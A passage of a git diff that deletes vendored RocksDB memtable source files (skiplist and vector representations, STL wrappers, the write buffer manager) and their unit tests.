-
-  enum ReaderState {
-    STARTING,
-    RUNNING,
-    DONE
-  };
-
-  explicit TestState(int s)
-      : seed_(s), quit_flag_(false), state_(STARTING), state_cv_(&mu_) {}
-
-  void Wait(ReaderState s) {
-    mu_.Lock();
-    while (state_ != s) {
-      state_cv_.Wait();
-    }
-    mu_.Unlock();
-  }
-
-  void Change(ReaderState s) {
-    mu_.Lock();
-    state_ = s;
-    state_cv_.Signal();
-    mu_.Unlock();
-  }
-
- private:
-  port::Mutex mu_;
-  ReaderState state_;
-  port::CondVar state_cv_;
-};
-
-static void ConcurrentReader(void* arg) {
-  TestState* state = reinterpret_cast<TestState*>(arg);
-  Random rnd(state->seed_);
-  int64_t reads = 0;
-  state->Change(TestState::RUNNING);
-  while (!state->quit_flag_.load(std::memory_order_acquire)) {
-    state->t_.ReadStep(&rnd);
-    ++reads;
-  }
-  state->Change(TestState::DONE);
-}
-
-static void RunConcurrent(int run) {
-  const int seed = test::RandomSeed() + (run * 100);
-  Random rnd(seed);
-  const int N = 1000;
-  const int kSize = 1000;
-  for (int i = 0; i < N; i++) {
-    if ((i % 100) == 0) {
-      fprintf(stderr, "Run %d of %d\n", i, N);
-    }
-    TestState state(seed + 1);
-    Env::Default()->SetBackgroundThreads(1);
-    Env::Default()->Schedule(ConcurrentReader, &state);
-    state.Wait(TestState::RUNNING);
-    for (int k = 0; k < kSize; k++) {
-      state.t_.WriteStep(&rnd);
-    }
-    state.quit_flag_.store(true, std::memory_order_release);
-    state.Wait(TestState::DONE);
-  }
-}
-
-TEST_F(SkipTest, Concurrent1) { RunConcurrent(1); }
-TEST_F(SkipTest, Concurrent2) { RunConcurrent(2); }
-TEST_F(SkipTest, Concurrent3) { RunConcurrent(3); }
-TEST_F(SkipTest, Concurrent4) { RunConcurrent(4); }
-TEST_F(SkipTest, Concurrent5) { RunConcurrent(5); }
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/memtable/skiplistrep.cc b/thirdparty/rocksdb/memtable/skiplistrep.cc
deleted file mode 100644
index f56be5d..0000000
--- a/thirdparty/rocksdb/memtable/skiplistrep.cc
+++ /dev/null
@@ -1,277 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "memtable/inlineskiplist.h"
-#include "db/memtable.h"
-#include "rocksdb/memtablerep.h"
-#include "util/arena.h"
-
-namespace rocksdb {
-namespace {
-class SkipListRep : public MemTableRep {
-  InlineSkipList<const MemTableRep::KeyComparator&> skip_list_;
-  const MemTableRep::KeyComparator& cmp_;
-  const SliceTransform* transform_;
-  const size_t lookahead_;
-
-  friend class LookaheadIterator;
-public:
- explicit SkipListRep(const MemTableRep::KeyComparator& compare,
-                      Allocator* allocator, const SliceTransform* transform,
-                      const size_t lookahead)
-     : MemTableRep(allocator),
-       skip_list_(compare, allocator),
-       cmp_(compare),
-       transform_(transform),
-       lookahead_(lookahead) {}
-
- virtual KeyHandle Allocate(const size_t len, char** buf) override {
-   *buf = skip_list_.AllocateKey(len);
-   return static_cast<KeyHandle>(*buf);
-  }
-
-  // Insert key into the list.
-  // REQUIRES: nothing that compares equal to key is currently in the list.
-  virtual void Insert(KeyHandle handle) override {
-    skip_list_.Insert(static_cast<char*>(handle));
-  }
-
-  virtual void InsertWithHint(KeyHandle handle, void** hint) override {
-    skip_list_.InsertWithHint(static_cast<char*>(handle), hint);
-  }
-
-  virtual void InsertConcurrently(KeyHandle handle) override {
-    skip_list_.InsertConcurrently(static_cast<char*>(handle));
-  }
-
-  // Returns true iff an entry that compares equal to key is in the list.
-  virtual bool Contains(const char* key) const override {
-    return skip_list_.Contains(key);
-  }
-
-  virtual size_t ApproximateMemoryUsage() override {
-    // All memory is allocated through allocator; nothing to report here
-    return 0;
-  }
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override {
-    SkipListRep::Iterator iter(&skip_list_);
-    Slice dummy_slice;
-    for (iter.Seek(dummy_slice, k.memtable_key().data());
-         iter.Valid() && callback_func(callback_args, iter.key());
-         iter.Next()) {
-    }
-  }
-
-  uint64_t ApproximateNumEntries(const Slice& start_ikey,
-                                 const Slice& end_ikey) override {
-    std::string tmp;
-    uint64_t start_count =
-        skip_list_.EstimateCount(EncodeKey(&tmp, start_ikey));
-    uint64_t end_count = skip_list_.EstimateCount(EncodeKey(&tmp, end_ikey));
-    return (end_count >= start_count) ? (end_count - start_count) : 0;
-  }
-
-  virtual ~SkipListRep() override { }
-
-  // Iteration over the contents of a skip list
-  class Iterator : public MemTableRep::Iterator {
-    InlineSkipList<const MemTableRep::KeyComparator&>::Iterator iter_;
-
-   public:
-    // Initialize an iterator over the specified list.
-    // The returned iterator is not valid.
-    explicit Iterator(
-        const InlineSkipList<const MemTableRep::KeyComparator&>* list)
-        : iter_(list) {}
-
-    virtual ~Iterator() override { }
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const override {
-      return iter_.Valid();
-    }
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const override {
-      return iter_.key();
-    }
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() override {
-      iter_.Next();
-    }
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() override {
-      iter_.Prev();
-    }
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& user_key, const char* memtable_key)
-        override {
-      if (memtable_key != nullptr) {
-        iter_.Seek(memtable_key);
-      } else {
-        iter_.Seek(EncodeKey(&tmp_, user_key));
-      }
-    }
-
-    // Retreat to the last entry with a key <= target
-    virtual void SeekForPrev(const Slice& user_key,
-                             const char* memtable_key) override {
-      if (memtable_key != nullptr) {
-        iter_.SeekForPrev(memtable_key);
-      } else {
-        iter_.SeekForPrev(EncodeKey(&tmp_, user_key));
-      }
-    }
-
-    // Position at the first entry in list.
-    // Final state of iterator is Valid() iff list is not empty.
-    virtual void SeekToFirst() override {
-      iter_.SeekToFirst();
-    }
-
-    // Position at the last entry in list.
-    // Final state of iterator is Valid() iff list is not empty.
-    virtual void SeekToLast() override {
-      iter_.SeekToLast();
-    }
-   protected:
-    std::string tmp_;       // For passing to EncodeKey
-  };
-
-  // Iterator over the contents of a skip list which also keeps track of the
-  // previously visited node. In Seek(), it examines a few nodes after it
-  // first, falling back to O(log n) search from the head of the list only if
-  // the target key hasn't been found.
-  class LookaheadIterator : public MemTableRep::Iterator {
-   public:
-    explicit LookaheadIterator(const SkipListRep& rep) :
-        rep_(rep), iter_(&rep_.skip_list_), prev_(iter_) {}
-
-    virtual ~LookaheadIterator() override {}
-
-    virtual bool Valid() const override {
-      return iter_.Valid();
-    }
-
-    virtual const char *key() const override {
-      assert(Valid());
-      return iter_.key();
-    }
-
-    virtual void Next() override {
-      assert(Valid());
-
-      bool advance_prev = true;
-      if (prev_.Valid()) {
-        auto k1 = rep_.UserKey(prev_.key());
-        auto k2 = rep_.UserKey(iter_.key());
-
-        if (k1.compare(k2) == 0) {
-          // same user key, don't move prev_
-          advance_prev = false;
-        } else if (rep_.transform_) {
-          // only advance prev_ if it has the same prefix as iter_
-          auto t1 = rep_.transform_->Transform(k1);
-          auto t2 = rep_.transform_->Transform(k2);
-          advance_prev = t1.compare(t2) == 0;
-        }
-      }
-
-      if (advance_prev) {
-        prev_ = iter_;
-      }
-      iter_.Next();
-    }
-
-    virtual void Prev() override {
-      assert(Valid());
-      iter_.Prev();
-      prev_ = iter_;
-    }
-
-    virtual void Seek(const Slice& internal_key, const char *memtable_key)
-        override {
-      const char *encoded_key =
-        (memtable_key != nullptr) ?
-            memtable_key : EncodeKey(&tmp_, internal_key);
-
-      if (prev_.Valid() && rep_.cmp_(encoded_key, prev_.key()) >= 0) {
-        // prev_.key() is smaller or equal to our target key; do a quick
-        // linear search (at most lookahead_ steps) starting from prev_
-        iter_ = prev_;
-
-        size_t cur = 0;
-        while (cur++ <= rep_.lookahead_ && iter_.Valid()) {
-          if (rep_.cmp_(encoded_key, iter_.key()) <= 0) {
-            return;
-          }
-          Next();
-        }
-      }
-
-      iter_.Seek(encoded_key);
-      prev_ = iter_;
-    }
-
-    virtual void SeekForPrev(const Slice& internal_key,
-                             const char* memtable_key) override {
-      const char* encoded_key = (memtable_key != nullptr)
-                                    ? memtable_key
-                                    : EncodeKey(&tmp_, internal_key);
-      iter_.SeekForPrev(encoded_key);
-      prev_ = iter_;
-    }
-
-    virtual void SeekToFirst() override {
-      iter_.SeekToFirst();
-      prev_ = iter_;
-    }
-
-    virtual void SeekToLast() override {
-      iter_.SeekToLast();
-      prev_ = iter_;
-    }
-
-   protected:
-    std::string tmp_;       // For passing to EncodeKey
-
-   private:
-    const SkipListRep& rep_;
-    InlineSkipList<const MemTableRep::KeyComparator&>::Iterator iter_;
-    InlineSkipList<const MemTableRep::KeyComparator&>::Iterator prev_;
-  };
-
-  virtual MemTableRep::Iterator* GetIterator(Arena* arena = nullptr) override {
-    if (lookahead_ > 0) {
-      void *mem =
-        arena ? arena->AllocateAligned(sizeof(SkipListRep::LookaheadIterator))
-              : operator new(sizeof(SkipListRep::LookaheadIterator));
-      return new (mem) SkipListRep::LookaheadIterator(*this);
-    } else {
-      void *mem =
-        arena ? arena->AllocateAligned(sizeof(SkipListRep::Iterator))
-              : operator new(sizeof(SkipListRep::Iterator));
-      return new (mem) SkipListRep::Iterator(&skip_list_);
-    }
-  }
-};
-}
-
-MemTableRep* SkipListFactory::CreateMemTableRep(
-    const MemTableRep::KeyComparator& compare, Allocator* allocator,
-    const SliceTransform* transform, Logger* logger) {
-  return new SkipListRep(compare, allocator, transform, lookahead_);
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/memtable/stl_wrappers.h b/thirdparty/rocksdb/memtable/stl_wrappers.h
deleted file mode 100644
index 19fa151..0000000
--- a/thirdparty/rocksdb/memtable/stl_wrappers.h
+++ /dev/null
@@ -1,34 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <map>
-#include <string>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-#include "util/murmurhash.h"
-
-namespace rocksdb {
-namespace stl_wrappers {
-
-class Base {
- protected:
-  const MemTableRep::KeyComparator& compare_;
-  explicit Base(const MemTableRep::KeyComparator& compare)
-      : compare_(compare) {}
-};
-
-struct Compare : private Base {
-  explicit Compare(const MemTableRep::KeyComparator& compare) : Base(compare) {}
-  inline bool operator()(const char* a, const char* b) const {
-    return compare_(a, b) < 0;
-  }
-};
-
-}
-}
diff --git a/thirdparty/rocksdb/memtable/vectorrep.cc b/thirdparty/rocksdb/memtable/vectorrep.cc
deleted file mode 100644
index e54025c..0000000
--- a/thirdparty/rocksdb/memtable/vectorrep.cc
+++ /dev/null
@@ -1,303 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-#include "rocksdb/memtablerep.h"
-
-#include <unordered_set>
-#include <set>
-#include <memory>
-#include <algorithm>
-#include <type_traits>
-
-#include "util/arena.h"
-#include "db/memtable.h"
-#include "memtable/stl_wrappers.h"
-#include "port/port.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-namespace {
-
-using namespace stl_wrappers;
-
-class VectorRep : public MemTableRep {
- public:
-  VectorRep(const KeyComparator& compare, Allocator* allocator, size_t count);
-
-  // Insert key into the collection. (The caller will pack key and value into a
-  // single buffer and pass that in as the parameter to Insert)
-  // REQUIRES: nothing that compares equal to key is currently in the
-  // collection.
-  virtual void Insert(KeyHandle handle) override;
-
-  // Returns true iff an entry that compares equal to key is in the collection.
-  virtual bool Contains(const char* key) const override;
-
-  virtual void MarkReadOnly() override;
-
-  virtual size_t ApproximateMemoryUsage() override;
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override;
-
-  virtual ~VectorRep() override { }
-
-  class Iterator : public MemTableRep::Iterator {
-    class VectorRep* vrep_;
-    std::shared_ptr<std::vector<const char*>> bucket_;
-    std::vector<const char*>::const_iterator mutable cit_;
-    const KeyComparator& compare_;
-    std::string tmp_;       // For passing to EncodeKey
-    bool mutable sorted_;
-    void DoSort() const;
-   public:
-    explicit Iterator(class VectorRep* vrep,
-      std::shared_ptr<std::vector<const char*>> bucket,
-      const KeyComparator& compare);
-
-    // Initialize an iterator over the specified collection.
-    // The returned iterator is not valid.
-    // explicit Iterator(const MemTableRep* collection);
-    virtual ~Iterator() override { };
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const override;
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const override;
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() override;
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() override;
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& user_key, const char* memtable_key) override;
-
-    // Advance to the first entry with a key <= target
-    virtual void SeekForPrev(const Slice& user_key,
-                             const char* memtable_key) override;
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() override;
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() override;
-  };
-
-  // Return an iterator over the keys in this representation.
-  virtual MemTableRep::Iterator* GetIterator(Arena* arena) override;
-
- private:
-  friend class Iterator;
-  typedef std::vector<const char*> Bucket;
-  std::shared_ptr<Bucket> bucket_;
-  mutable port::RWMutex rwlock_;
-  bool immutable_;
-  bool sorted_;
-  const KeyComparator& compare_;
-};
-
-void VectorRep::Insert(KeyHandle handle) {
-  auto* key = static_cast<char*>(handle);
-  WriteLock l(&rwlock_);
-  assert(!immutable_);
-  bucket_->push_back(key);
-}
-
-// Returns true iff an entry that compares equal to key is in the collection.
-bool VectorRep::Contains(const char* key) const {
-  ReadLock l(&rwlock_);
-  return std::find(bucket_->begin(), bucket_->end(), key) != bucket_->end();
-}
-
-void VectorRep::MarkReadOnly() {
-  WriteLock l(&rwlock_);
-  immutable_ = true;
-}
-
-size_t VectorRep::ApproximateMemoryUsage() {
-  return
-    sizeof(bucket_) + sizeof(*bucket_) +
-    bucket_->size() *
-    sizeof(
-      std::remove_reference<decltype(*bucket_)>::type::value_type
-    );
-}
-
-VectorRep::VectorRep(const KeyComparator& compare, Allocator* allocator,
-                     size_t count)
-    : MemTableRep(allocator),
-      bucket_(new Bucket()),
-      immutable_(false),
-      sorted_(false),
-      compare_(compare) {
-  bucket_.get()->reserve(count);
-}
-
-VectorRep::Iterator::Iterator(class VectorRep* vrep,
-                   std::shared_ptr<std::vector<const char*>> bucket,
-                   const KeyComparator& compare)
-: vrep_(vrep),
-  bucket_(bucket),
-  cit_(bucket_->end()),
-  compare_(compare),
-  sorted_(false) { }
-
-void VectorRep::Iterator::DoSort() const {
-  // vrep is non-null means that we are working on an immutable memtable
-  if (!sorted_ && vrep_ != nullptr) {
-    WriteLock l(&vrep_->rwlock_);
-    if (!vrep_->sorted_) {
-      std::sort(bucket_->begin(), bucket_->end(), Compare(compare_));
-      cit_ = bucket_->begin();
-      vrep_->sorted_ = true;
-    }
-    sorted_ = true;
-  }
-  if (!sorted_) {
-    std::sort(bucket_->begin(), bucket_->end(), Compare(compare_));
-    cit_ = bucket_->begin();
-    sorted_ = true;
-  }
-  assert(sorted_);
-  assert(vrep_ == nullptr || vrep_->sorted_);
-}
-
-// Returns true iff the iterator is positioned at a valid node.
-bool VectorRep::Iterator::Valid() const {
-  DoSort();
-  return cit_ != bucket_->end();
-}
-
-// Returns the key at the current position.
-// REQUIRES: Valid()
-const char* VectorRep::Iterator::key() const {
-  assert(sorted_);
-  return *cit_;
-}
-
-// Advances to the next position.
-// REQUIRES: Valid()
-void VectorRep::Iterator::Next() {
-  assert(sorted_);
-  if (cit_ == bucket_->end()) {
-    return;
-  }
-  ++cit_;
-}
-
-// Advances to the previous position.
-// REQUIRES: Valid()
-void VectorRep::Iterator::Prev() {
-  assert(sorted_);
-  if (cit_ == bucket_->begin()) {
-    // If you try to go back from the first element, the iterator should be
-    // invalidated. So we set it to past-the-end. This means that you can
-    // treat the container circularly.
-    cit_ = bucket_->end();
-  } else {
-    --cit_;
-  }
-}
-
-// Advance to the first entry with a key >= target
-void VectorRep::Iterator::Seek(const Slice& user_key,
-                               const char* memtable_key) {
-  DoSort();
-  // Do binary search to find first value not less than the target
-  const char* encoded_key =
-      (memtable_key != nullptr) ? memtable_key : EncodeKey(&tmp_, user_key);
-  cit_ = std::equal_range(bucket_->begin(),
-                          bucket_->end(),
-                          encoded_key,
-                          [this] (const char* a, const char* b) {
-                            return compare_(a, b) < 0;
-                          }).first;
-}
-
-// Advance to the first entry with a key <= target
-void VectorRep::Iterator::SeekForPrev(const Slice& user_key,
-                                      const char* memtable_key) {
-  assert(false);
-}
-
-// Position at the first entry in collection.
-// Final state of iterator is Valid() iff collection is not empty.
-void VectorRep::Iterator::SeekToFirst() {
-  DoSort();
-  cit_ = bucket_->begin();
-}
-
-// Position at the last entry in collection.
-// Final state of iterator is Valid() iff collection is not empty.
-void VectorRep::Iterator::SeekToLast() {
-  DoSort();
-  cit_ = bucket_->end();
-  if (bucket_->size() != 0) {
-    --cit_;
-  }
-}
-
-void VectorRep::Get(const LookupKey& k, void* callback_args,
-                    bool (*callback_func)(void* arg, const char* entry)) {
-  rwlock_.ReadLock();
-  VectorRep* vector_rep;
-  std::shared_ptr<Bucket> bucket;
-  if (immutable_) {
-    vector_rep = this;
-  } else {
-    vector_rep = nullptr;
-    bucket.reset(new Bucket(*bucket_));  // make a copy
-  }
-  VectorRep::Iterator iter(vector_rep, immutable_ ? bucket_ : bucket, compare_);
-  rwlock_.ReadUnlock();
-
-  for (iter.Seek(k.user_key(), k.memtable_key().data());
-       iter.Valid() && callback_func(callback_args, iter.key()); iter.Next()) {
-  }
-}
-
-MemTableRep::Iterator* VectorRep::GetIterator(Arena* arena) {
-  char* mem = nullptr;
-  if (arena != nullptr) {
-    mem = arena->AllocateAligned(sizeof(Iterator));
-  }
-  ReadLock l(&rwlock_);
-  // Do not sort here. The sorting would be done the first time
-  // a Seek is performed on the iterator.
-  if (immutable_) {
-    if (arena == nullptr) {
-      return new Iterator(this, bucket_, compare_);
-    } else {
-      return new (mem) Iterator(this, bucket_, compare_);
-    }
-  } else {
-    std::shared_ptr<Bucket> tmp;
-    tmp.reset(new Bucket(*bucket_)); // make a copy
-    if (arena == nullptr) {
-      return new Iterator(nullptr, tmp, compare_);
-    } else {
-      return new (mem) Iterator(nullptr, tmp, compare_);
-    }
-  }
-}
-} // anon namespace
-
-MemTableRep* VectorRepFactory::CreateMemTableRep(
-    const MemTableRep::KeyComparator& compare, Allocator* allocator,
-    const SliceTransform*, Logger* logger) {
-  return new VectorRep(compare, allocator, count_);
-}
-} // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/write_buffer_manager.cc b/thirdparty/rocksdb/memtable/write_buffer_manager.cc
deleted file mode 100644
index bac0fdd..0000000
--- a/thirdparty/rocksdb/memtable/write_buffer_manager.cc
+++ /dev/null
@@ -1,124 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/write_buffer_manager.h"
-#include <mutex>
-#include "util/coding.h"
-
-namespace rocksdb {
-#ifndef ROCKSDB_LITE
-namespace {
-const size_t kSizeDummyEntry = 1024 * 1024;
-// The key will be longer than keys for blocks in SST files so they won't
-// conflict.
-const size_t kCacheKeyPrefix = kMaxVarint64Length * 4 + 1;
-}  // namespace
-
-struct WriteBufferManager::CacheRep {
-  std::shared_ptr<Cache> cache_;
-  std::mutex cache_mutex_;
-  std::atomic<size_t> cache_allocated_size_;
-  // The non-prefix part will be updated according to the ID to use.
-  char cache_key_[kCacheKeyPrefix + kMaxVarint64Length];
-  uint64_t next_cache_key_id_ = 0;
-  std::vector<Cache::Handle*> dummy_handles_;
-
-  explicit CacheRep(std::shared_ptr<Cache> cache)
-      : cache_(cache), cache_allocated_size_(0) {
-    memset(cache_key_, 0, kCacheKeyPrefix);
-    size_t pointer_size = sizeof(const void*);
-    assert(pointer_size <= kCacheKeyPrefix);
-    memcpy(cache_key_, static_cast<const void*>(this), pointer_size);
-  }
-
-  Slice GetNextCacheKey() {
-    memset(cache_key_ + kCacheKeyPrefix, 0, kMaxVarint64Length);
-    char* end =
-        EncodeVarint64(cache_key_ + kCacheKeyPrefix, next_cache_key_id_++);
-    return Slice(cache_key_, static_cast<size_t>(end - cache_key_));
-  }
-};
-#else
-struct WriteBufferManager::CacheRep {};
-#endif  // ROCKSDB_LITE
-
-WriteBufferManager::WriteBufferManager(size_t _buffer_size,
-                                       std::shared_ptr<Cache> cache)
-    : buffer_size_(_buffer_size),
-      mutable_limit_(buffer_size_ * 7 / 8),
-      memory_used_(0),
-      memory_active_(0),
-      cache_rep_(nullptr) {
-#ifndef ROCKSDB_LITE
-  if (cache) {
-    // Construct the cache key using the pointer to this.
-    cache_rep_.reset(new CacheRep(cache));
-  }
-#endif  // ROCKSDB_LITE
-}
-
-WriteBufferManager::~WriteBufferManager() {
-#ifndef ROCKSDB_LITE
-  if (cache_rep_) {
-    for (auto* handle : cache_rep_->dummy_handles_) {
-      cache_rep_->cache_->Release(handle, true);
-    }
-  }
-#endif  // ROCKSDB_LITE
-}
-
-// Should only be called from write thread
-void WriteBufferManager::ReserveMemWithCache(size_t mem) {
-#ifndef ROCKSDB_LITE
-  assert(cache_rep_ != nullptr);
-  // Use a mutex to protect various data structures. Can be optimzied to a
-  // lock-free solution if it ends up with a performance bottleneck.
-  std::lock_guard<std::mutex> lock(cache_rep_->cache_mutex_);
-
-  size_t new_mem_used = memory_used_.load(std::memory_order_relaxed) + mem;
-  memory_used_.store(new_mem_used, std::memory_order_relaxed);
-  while (new_mem_used > cache_rep_->cache_allocated_size_) {
-    // Expand size by at least 1MB.
-    // Add a dummy record to the cache
-    Cache::Handle* handle;
-    cache_rep_->cache_->Insert(cache_rep_->GetNextCacheKey(), nullptr,
-                               kSizeDummyEntry, nullptr, &handle);
-    cache_rep_->dummy_handles_.push_back(handle);
-    cache_rep_->cache_allocated_size_ += kSizeDummyEntry;
-  }
-#endif  // ROCKSDB_LITE
-}
-
-void WriteBufferManager::FreeMemWithCache(size_t mem) {
-#ifndef ROCKSDB_LITE
-  assert(cache_rep_ != nullptr);
-  // Use a mutex to protect various data structures. Can be optimzied to a
-  // lock-free solution if it ends up with a performance bottleneck.
-  std::lock_guard<std::mutex> lock(cache_rep_->cache_mutex_);
-  size_t new_mem_used = memory_used_.load(std::memory_order_relaxed) - mem;
-  memory_used_.store(new_mem_used, std::memory_order_relaxed);
-  // Gradually shrink memory costed in the block cache if the actual
-  // usage is less than 3/4 of what we reserve from the block cache.
-  // We do this becausse:
-  // 1. we don't pay the cost of the block cache immediately a memtable is
-  //    freed, as block cache insert is expensive;
-  // 2. eventually, if we walk away from a temporary memtable size increase,
-  //    we make sure shrink the memory costed in block cache over time.
-  // In this way, we only shrink costed memory showly even there is enough
-  // margin.
-  if (new_mem_used < cache_rep_->cache_allocated_size_ / 4 * 3 &&
-      cache_rep_->cache_allocated_size_ - kSizeDummyEntry > new_mem_used) {
-    assert(!cache_rep_->dummy_handles_.empty());
-    cache_rep_->cache_->Release(cache_rep_->dummy_handles_.back(), true);
-    cache_rep_->dummy_handles_.pop_back();
-    cache_rep_->cache_allocated_size_ -= kSizeDummyEntry;
-  }
-#endif  // ROCKSDB_LITE
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/memtable/write_buffer_manager_test.cc b/thirdparty/rocksdb/memtable/write_buffer_manager_test.cc
deleted file mode 100644
index 0fc9fd0..0000000
--- a/thirdparty/rocksdb/memtable/write_buffer_manager_test.cc
+++ /dev/null
@@ -1,151 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/write_buffer_manager.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class WriteBufferManagerTest : public testing::Test {};
-
-#ifndef ROCKSDB_LITE
-TEST_F(WriteBufferManagerTest, ShouldFlush) {
-  // A write buffer manager of size 10MB
-  std::unique_ptr<WriteBufferManager> wbf(
-      new WriteBufferManager(10 * 1024 * 1024));
-
-  wbf->ReserveMem(8 * 1024 * 1024);
-  ASSERT_FALSE(wbf->ShouldFlush());
-  // 90% of the hard limit will hit the condition
-  wbf->ReserveMem(1 * 1024 * 1024);
-  ASSERT_TRUE(wbf->ShouldFlush());
-  // Scheduling for freeing will release the condition
-  wbf->ScheduleFreeMem(1 * 1024 * 1024);
-  ASSERT_FALSE(wbf->ShouldFlush());
-
-  wbf->ReserveMem(2 * 1024 * 1024);
-  ASSERT_TRUE(wbf->ShouldFlush());
-
-  wbf->ScheduleFreeMem(4 * 1024 * 1024);
-  // 11MB total, 6MB mutable. hard limit still hit
-  ASSERT_TRUE(wbf->ShouldFlush());
-
-  wbf->ScheduleFreeMem(2 * 1024 * 1024);
-  // 11MB total, 4MB mutable. hard limit stills but won't flush because more
-  // than half data is already being flushed.
-  ASSERT_FALSE(wbf->ShouldFlush());
-
-  wbf->ReserveMem(4 * 1024 * 1024);
-  // 15 MB total, 8MB mutable.
-  ASSERT_TRUE(wbf->ShouldFlush());
-
-  wbf->FreeMem(7 * 1024 * 1024);
-  // 9MB total, 8MB mutable.
-  ASSERT_FALSE(wbf->ShouldFlush());
-}
-
-TEST_F(WriteBufferManagerTest, CacheCost) {
-  // 1GB cache
-  std::shared_ptr<Cache> cache = NewLRUCache(1024 * 1024 * 1024, 4);
-  // A write buffer manager of size 50MB
-  std::unique_ptr<WriteBufferManager> wbf(
-      new WriteBufferManager(50 * 1024 * 1024, cache));
-
-  // Allocate 1.5MB will allocate 2MB
-  wbf->ReserveMem(1536 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 2 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 2 * 1024 * 1024 + 10000);
-
-  // Allocate another 2MB
-  wbf->ReserveMem(2 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 4 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 4 * 1024 * 1024 + 10000);
-
-  // Allocate another 20MB
-  wbf->ReserveMem(20 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 24 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 24 * 1024 * 1024 + 10000);
-
-  // Free 2MB will not cause any change in cache cost
-  wbf->FreeMem(2 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 24 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 24 * 1024 * 1024 + 10000);
-
-  ASSERT_FALSE(wbf->ShouldFlush());
-
-  // Allocate another 30MB
-  wbf->ReserveMem(30 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 52 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 52 * 1024 * 1024 + 10000);
-  ASSERT_TRUE(wbf->ShouldFlush());
-
-  ASSERT_TRUE(wbf->ShouldFlush());
-
-  wbf->ScheduleFreeMem(20 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 52 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 52 * 1024 * 1024 + 10000);
-
-  // Still need flush as the hard limit hits
-  ASSERT_TRUE(wbf->ShouldFlush());
-
-  // Free 20MB will releae 1MB from cache
-  wbf->FreeMem(20 * 1024 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 51 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 51 * 1024 * 1024 + 10000);
-
-  ASSERT_FALSE(wbf->ShouldFlush());
-
-  // Every free will release 1MB if still not hit 3/4
-  wbf->FreeMem(16 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 50 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 50 * 1024 * 1024 + 10000);
-
-  wbf->FreeMem(16 * 1024);
-  ASSERT_GE(cache->GetPinnedUsage(), 49 * 1024 * 1024);
-  ASSERT_LT(cache->GetPinnedUsage(), 49 * 1024 * 1024 + 10000);
-
-  // Free 2MB will not cause any change in cache cost
